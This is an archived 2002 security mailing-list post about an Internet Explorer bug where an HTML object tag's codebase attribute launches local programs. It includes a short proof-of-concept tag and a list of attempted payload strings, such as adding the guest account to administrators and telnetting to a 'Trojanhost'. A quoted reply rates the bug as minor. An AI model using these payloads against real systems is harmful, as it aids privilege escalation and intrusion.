IExplorer

From: Steve (steveat_private)
Date: Wed Mar 06 2002 - 15:54:23 PST

Next message: adamb: "Re: Rumours about Apache 1.3.22 exploits -> analysis of so-called exploit client"

Previous message: Vanja Hrustic: "Re: Rumours about Apache 1.3.22 exploits"
Next in thread: CT: "Re: IExplorer"
Reply: CT: "Re: IExplorer"
Reply: Chris Eidem: "RE: IExplorer"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I know we have seen many websites already showing this as a problem.


   <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>
   <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/windows/system32/calc.exe"></object>

Of course, this is part of the HTML that is causing this problem, but I was
unable to reformat the string to cause any substantial privilege escalation
in the syste, via this bug.

It could well be because I do not know much about Active-X, so please do
advice. I am ignorant but wanting to learn !

Here are somethings I have tried with no results (Tested on Windows XP)
codebase= "strings to try below"

"C:/windows/system32/net.exe send localhost Testing"
"C:/windows/system32/net.exe localgroup administrators guest /add"
"C:/windows/system32/iisreset.exe"
"C:/windows/system32/telnet Trojanhost"
"C:/windows/system32/cmd.exe /k net send localhost Testing"
etc...


I am not game enough to run "format c:/" of course, but anyone tell me why
these strings fail miserably ? Or maybe the bug isnt exactly that easily
exploitable ?







Thomas Thornbury <thorntat_private> wrote:

> This has got to be one of the scarier exploits in recent memory.

Nah -- _far_ from it.

Several people with a good record of finding truly bad holes in IE
and related s/w have been banging away at this for some time now.
First, to date no-one has found a way to use it for executing
arbitrary code and there have been several other holes recently that
do allow arbitrary code execution.  Second, no-one has even found a
way to poke parameters to the programs that can be launched this
way, which have to have a fully specified, local to the target
program filename or pre-existing CLSID definition in the target
machine's registry:

   http://home.austin.rr.com/wiredgoddess/thepull/funRun.html

I'd rate it "mildly interesting"...

This does not mean MS should delay fixing it until some clever soul
does work out how to achieve either or both the above, but it
certainly makes it orders of magnitude less interesting and less
worrying than some of the recent "auto-detach and run" Email
attachments or MIME "inclusions" in web pages bugs.

Next message: adamb: "Re: Rumours about Apache 1.3.22 exploits -> analysis of so-called exploit client"
Previous message: Vanja Hrustic: "Re: Rumours about Apache 1.3.22 exploits"
Next in thread: CT: "Re: IExplorer"
Reply: CT: "Re: IExplorer"
Reply: Chris Eidem: "RE: IExplorer"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Mar 06 2002 - 20:51:18 PST